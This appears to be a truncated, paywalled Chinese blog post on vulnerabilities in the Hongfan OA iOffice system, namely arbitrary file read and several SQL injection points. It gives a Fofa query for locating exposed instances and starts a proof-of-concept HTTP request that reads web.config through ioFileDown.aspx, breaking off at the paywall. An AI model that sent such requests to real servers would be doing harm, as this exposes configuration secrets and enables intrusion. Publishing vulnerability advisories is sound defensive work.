超级会员免费看
红帆OA办公自动化系统因存在多个安全漏洞,包括ioFileDown接口的任意文件读取及CAWS.asmx、udfGetDocStep、wssRtFile接口的SQL注入问题,可能导致严重的信息安全风险。影响范围主要针对红帆-ioffice,文中详细介绍了漏洞的复现过程。
简介
红帆OA,即红帆办公自动化系统,是一种基于微软.NET技术开发的办公自动化解决方案。它旨在解决企业或政府办公中遇到的“自动化孤岛”和“信息化孤岛”问题,提供支持信息访问、传递以及跨组织工作的集成化商务环境。
漏洞简介
红帆OA 存在多处漏洞,包括SQL注入和任意文件读取。
影响范围
红帆-ioffice
Fofa:
app=“红帆-ioffice”
漏洞复现
ioFileDown接口任意文件读取
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=/ioffice/web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: image/avif,image/webp,*/*
Accep
订阅专栏 解锁全文
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
